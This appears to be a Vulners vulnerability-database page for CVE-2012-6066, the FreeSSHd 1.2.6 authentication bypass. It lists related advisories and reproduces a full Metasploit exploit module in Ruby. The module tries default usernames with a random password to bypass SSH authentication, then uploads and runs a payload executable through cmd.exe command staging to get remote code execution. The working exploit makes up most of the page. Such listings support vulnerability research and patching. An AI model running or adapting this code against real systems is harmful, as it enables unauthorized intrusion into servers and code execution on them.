Vulners
Lucene search
FreeSSHd 1.2.6 Authentication Bypass Vulnerability
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2012-6066 | 2 Dec 201200:00 | – | circl |
 | CVE-2012-6066 | 4 Dec 201223:00 | – | cve |
 | CVE-2012-6066 | 4 Dec 201223:00 | – | cvelist |
 | freeSSHd 1.2.6 - Authentication Bypass (Metasploit) | 15 Jan 201300:00 | – | exploitdb |
 | freeFTPd / freeSSHd SFTP Authentication Bypass | 11 Dec 201200:00 | – | nessus |
 | Freesshd Authentication Bypass | 13 Jan 201316:08 | – | metasploit |
 | CVE-2012-6066 | 4 Dec 201223:55 | – | nvd |
 | FreeSSHd 1.2.6 Authentication Bypass | 15 Jan 201300:00 | – | packetstorm |
 | Authentication flaw | 4 Dec 201223:55 | – | prion |
 | CVE-2012-6066 | 22 May 202503:51 | – | redhatcve |
10
require 'msf/core'
require 'tempfile'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Freesshd Authentication Bypass",
'Description' => %q{
This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
authentication. You just need the username (which defaults to root). The exploit
has been tested with both password and public key authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Aris', # Vulnerability discovery and Exploit
'kcope', # 2012 Exploit
'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-6066' ],
[ 'OSVDB', '88006' ],
[ 'BID', '56785' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
],
'Platform' => 'win',
'Privileged' => true,
'DisclosureDate' => "Aug 11 2010",
'Targets' =>
[
[ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
],
'DefaultTarget' => 0
))
register_options(
[
OptInt.new('RPORT', [false, 'The target port', 22]),
OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
], self.class)
end
def load_netssh
begin
require 'net/ssh'
return true
rescue LoadError
return false
end
end
def check
connect
banner = sock.recv(30)
disconnect
if banner =~ /SSH-2.0-WeOnlyDo/
version=banner.split(" ")[1]
return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def upload_payload(connection)
exe = generate_payload_exe
filename = rand_text_alpha(8) + ".exe"
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
opts = {
:linemax => 1700,
:decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
}
cmds = cmdstager.generate(opts)
if (cmds.nil? or cmds.length < 1)
print_error("The command stager could not be generated")
raise ArgumentError
end
cmds.each { |cmd|
ret = connection.exec!("cmd.exe /c "+cmd)
}
end
def setup_ssh_options
pass=rand_text_alpha(8)
options={
:password => pass,
:port => datastore['RPORT'],
:timeout => 1,
:proxies => datastore['Proxies'],
:key_data => OpenSSL::PKey::RSA.new(2048).to_pem
}
return options
end
def do_login(username,options)
print_status("Trying username "+username)
options[:username]=username
transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
auth = Net::SSH::Authentication::Session.new(transport, options)
auth.authenticate("ssh-connection", username, options[:password])
connection = Net::SSH::Connection::Session.new(transport, options)
begin
Timeout.timeout(10) do
connection.exec!('cmd.exe /c echo')
end
rescue RuntimeError
return nil
rescue Timeout::Error
print_status("Timeout")
return nil
end
return connection
end
def exploit
#
# Load net/ssh so we can talk the SSH protocol
#
has_netssh = load_netssh
if not has_netssh
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
return
end
options=setup_ssh_options
connection = nil
usernames=datastore['USERNAMES'].split(' ')
usernames.each { |username|
connection=do_login(username,options)
break if connection
}
if connection
print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
upload_payload(connection)
handler
end
end
end
# 0day.today [2018-03-20] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jan 2013 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.75871